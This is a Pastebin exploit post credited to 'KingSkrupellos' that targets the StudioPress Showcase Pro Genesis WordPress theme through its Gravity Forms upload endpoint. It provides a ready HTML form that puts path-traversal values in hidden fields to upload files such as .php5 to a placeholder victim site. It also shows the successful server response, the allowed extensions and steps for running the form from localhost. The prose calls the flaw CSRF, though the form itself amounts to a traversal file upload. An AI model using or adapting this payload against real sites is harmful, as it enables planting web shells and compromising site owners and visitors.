Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WordPress StudioPress Showcase Pro Genesis Framework CSRF Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 22/05/2019
- # Vendor Homepage : studiopress.com - gravityforms.com
- # Software Information Link : my.studiopress.com/themes/showcase/
- # Software Affected Versions : N/A
- # Software Price Type : Paid Download - 129.95 $
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Impact :
- ***********
- WordPress StudioPress Showcase Pro Genesis Framework is vulnerable to
- cross-site request forgery, caused by improper validation of user-supplied input.
- By persuading an authenticated user to visit a malicious Web site, a remote attacker
- could send a malformed HTTP request to perform unauthorized actions.
- An attacker could exploit this vulnerability to perform cross-site scripting
- attacks, Web cache poisoning, and other malicious activities.
- The web application does not, or can not, sufficiently verify whether a well-formed,
- valid, consistent request was intentionally provided by the user who submitted the request.
- When a web server is designed to receive a request from a client without any mechanism
- for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
- client into making an unintentional request to the web server which will be treated as an
- authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
- can result in exposure of data or unintended code execution.
- ####################################################################
- # CSRF Cross Site Request Forgery Exploit :
- ****************************************
- <title>WordPress StudioPress Showcase Pro Genesis Framework Input Exploiter</title>
- <form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">
- <body background=" ">
- <input type="file" name="file" id="file"><br>
- <input name="form_id" value="../../../" type=hidden">
- <input name="name" value="kingskrupellos.html" type=''hidden">
- <input name="gform_unique_id" value="../../" type="hidden">
- <input name="field_id" value="" type="hidden">
- <input type="submit" name="gform_submit" value="submit">
- </form>
- # Directory File Path :
- ***********************
- /_input__kingskrupellos.php5
- /_input__[YOURFILENAME].php5
- # Vulnerability Error :
- *******************
- {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
- # Vulnerability Error [ Successful ] :
- *******************************
- {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
- # Allowed File Extensions :
- *************************
- .html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf
- # Example Usage for Windows :
- ******************************
- # Use with XAMPP Control Panel and your Localhost.
- # Use from htdocs folder located in XAMPP
- # 127.0.0.1/wordpressshowcasegenesisframeworkexploiter.html
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment